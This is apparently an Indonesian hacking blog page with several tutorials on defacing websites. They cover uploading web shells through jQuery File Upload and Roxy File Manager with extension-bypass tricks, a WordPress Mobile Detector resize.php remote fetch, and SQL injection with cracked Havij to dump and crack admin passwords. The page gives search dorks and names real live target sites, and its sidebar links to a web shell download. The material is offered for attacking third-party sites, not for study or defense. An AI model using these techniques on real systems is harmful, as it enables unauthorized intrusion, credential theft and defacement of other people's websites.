Cara Deface Jquery File Upload


assalamualaikum wr.wb
sore yang cerah untuk bikin post :'v ,kali ini gua bakal share POC
Jquery File Upload :'v
menurut gue ini cara deface yang paling mudah
tapi kita harus pande pande bypass ext shell nya :'v
ok kita lanjut ke tutorial

Bahan Bahan

-Shell ext :php.fla / php56 /php6 /php2 /php1 /.ndsfx / dll
-dork : Touch Me 
csrf onlen : Mpssh
exploit : http://target.com/[path]/server/php/
 itu aja :'v

Tutorial 

 yang pertama adalah kita dorking bisa lewat google image ato google biasa
klo dorking pake google image ya tinggal pencet images :'v di bawah kolom pencarian
contoh w dorking di google image :
Google Image















ciri ciri vuln ? seperti ini :'v Forbidden ? tinggalkan sadja :'v














ok lanjut ekse go to csrf nya :) trus isi url target
trus post filenya files [] contoh punya saya :
selanjut nya pencet lock target :'v abis itu upload shell klean trus pencet upload gan :'v


selanjutnya kita diredirect ke web tersebut lalu mendapatkan pesan sbb :

nah klo seperti itu berarti shell kita ter upload sekarang kita akses dengan menambahkan /files/namashell
contoh : www.kontok.com/server/php/files/w.php.fla











mudah kan ? masih kurang faham ? tenang ada vidionya kok

jangan lupa ya dilike fp nya :)

sekian terima kasih






 


vào lúc Không có nhận xét nào:
Nhãn: ,

Cara Deface Dengan SQLI (Havij)

kali ini gua mau share deface dengan sqli with Havij oke sebelumnya gua udah share tools havij ini
sekarang gua mau share cara makenya oke langsung aja

Bahan Bahan 

-Havij Crack nya (download disini gan)
-google dork : (download disini)
-Kesabaran :D

Tutorial 

kita Extrack Havij 1.16 dlu di tempat yang mudah dijangkau contoh Desktop
lalu klik kanan pada havij nya lalu Klik Run as admin












penampakan havij nya gini gan












oke selanjutnya kamu cari target dlu contoh saya ada live target
live : www.labooi.com/page.php?articles=17
exploit : site.com/contoh.php?id=69'
tambahin petik
oke Selanjutnya kita masukin ke havij nya tanpa tanda petik












lihat ss diatas, oke selanjut nya adalah kita klik analyze












kita tunggu ampe statusnya analyze ok selanjutnya adalah kita lihat tabel database nya
pencet tables












setelah itu klik get tables













ok selanjutnya adalah kita nyari column yang berhubungan dengan user admin pencet get columns
 contoh :
     user
     admin
     users
berhubung saya dapetnya web brazil so gue pilih table
engi_utillisateurs












terlihat banyak sangad datanya :'v selanjutnya kita centang apa saja yang digunakan untuk login lalu pencet get data
contoh
email , username , password ,id , dll *use your brain












tuh keliatan kan user dan pw admin
tapi klo masih bentuk md5 kita harus hash dlu
contoh di table password kek gini
fb889735bdeb0f8fc200aad392c6aafa745c9284
nah tinggal kita hash saja di hashkiller.co.uk
selanjutnya tinggal login deh
Add caption














tuh liat punya saya heheh masuk ke dashboard admin
btw klo mentok nyari admin loginnya make admin finder yang saya sudah share
upload shell ? use your brain :)
masih kurang paham ? nih vidionya

segitu aja dari gua :) jangan lupa like fp kami ya ^_^
vào lúc Không có nhận xét nào:
Nhãn: ,

Wordpress Plugins Mobile Detector Shell Upload



yo :'v dah lama gk ngepos ea ainx gk ada imajinasi buat share tutor :'v
nyari exploit baru di exploit-db nemu juga okwowkowk
langsung aja

Bahan : 

dork : inurl:"/wp-content/plugins/wp-mobile-detector/"
          *kembangkan
bekas defacean kalian
oke langsung ke TKP

TKP

1. Dorking di google :'v pilih satu gan jangan semua :'v
2.nah klo sudah exploit dengan
wp-content/plugins/wp-mobile-detector/resize.php
contoh:http://site.com/wp-content/plugins/wp-mobile-detector/resize.php
3.abis itu kita anuin resize.php nya
contoh :http://site.com/wp-content/plugins/wp-mobile-detector/resize.php?src=site.com/deface.php
*site.com/deface.php nya ganti sama bekas defacean kalian
4.nah klo udah akses deh ^_^
akses ? http://site.com/wp-content/plugins/wp-mobile-detector/cache/shell.php

Demo

http://www.alrashidschool.com/ischool/wp-content/plugins/wp-mobile-detector/cache/h3.html
Kurang Paham ? vidio nya

vào lúc Không có nhận xét nào:
Nhãn: ,

Cara Deface Roxy File Manager

yu wazzap gaes >:( kali ini gue mao share cara deface dengan Roxy File Manager
yaudah berhubung udah malem yaudah deh langsung aja >:(

dork: intitle:"Roxy File Manager"
         inurl:fileman/uploads/
*kembangkan
ext shell : .php56 .php.fla, .php.xxx , .php5 .php6, .php.xxxjpg , .php.orion , .php.h3ll dll
pertama klean dorking di google :) trus cari target klean
nah abis itu exploit dengan
site.com/path/fileman/index.html <- kurang lebih seperti itu :'v
Live Target ainx : http://canhogiaresaigon.com.vn/quanly/fileman/index.html












abis itu upload shell kalean
Foto saat upload shell














nah klo kek gitu bisa gan sekarang tinggal akses deh
akses ? site.com/path/filemanager/Uploads/shell.php.fla












heheheheheheheheeh mudah kan ? Tinggal tebas aja tuh kwowkowkokwowkokw
oh iya jan lupa Like fp kita ya hehehehehe
vào lúc Không có nhận xét nào:
Nhãn: , ,
Đăng ký: Bài đăng (Atom)

Twelve Days of Christmas and More Christmas Songs | Nursery Rhymes

63f2405119ff3# The Twelve Days of Christmas is a classic Christmas song for children that has been around for hundreds of years. It’s both f...

  • The Frog Prince~ Famous Fairy Tales
    63f20f7892634#In the olden time, when wishing was having, there lived a King whose daughters were all beautiful; but the youngest was so exc...
  • Deface File Upload Elfinder 2.0
    Tutorial ini sama seperti Klik sini . Mungkin ada yang belom tau mari lanjut sadja bro Dork : inurl:/elfinder/elfinder.html+intitle:"...
  • Con7ext Web Shell
    Con7ext Web Shell  Download ->  Download Buatan sih RINTO ->  SHUN :) LOG ? No Error ? Contact Yg buat lah :v Gambar Burem ? emng dari...